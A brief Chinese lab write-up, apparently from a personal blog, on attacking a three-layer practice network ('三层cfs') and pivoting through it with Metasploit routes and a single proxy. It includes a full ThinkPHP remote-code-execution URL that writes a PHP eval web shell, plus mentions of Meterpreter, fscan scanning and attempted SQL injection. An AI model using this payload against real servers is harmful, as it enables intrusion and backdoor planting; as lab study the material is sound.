三层cfs
简介
这个只是为了深刻记录代理原理,所以尝试再做一次。
并且全程只使用msf 的代理
重点就是,多个路由,一个代理
通过这一个代理,就可以访问多层内网,但是必须在对应的metepreter 设置路由,可以直接为路由表,然后进行转发
信息收集
ip 查询

端口扫描

网站信息收集
访问

路径


找到一个flag?

查看版本
存在nginx
web渗透
利用thinkphp
1
/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=shell.php&vars[1][]=<?php @eval($_POST[cmd]);?>
写入成功


信息收集


发现是linux x64平台
上线msf
上传payload


开启代理




注意版本
测试

代理成功
内网信息收集
fscan


发现还存在192.168.22.22
横向移动
192.168.22.22
尝试访问

给浏览器开启代理


尝试sql注入

用不了一点…..
三层cfs
https://tsy244.github.io/2024/03/03/靶场记录/三层cfs/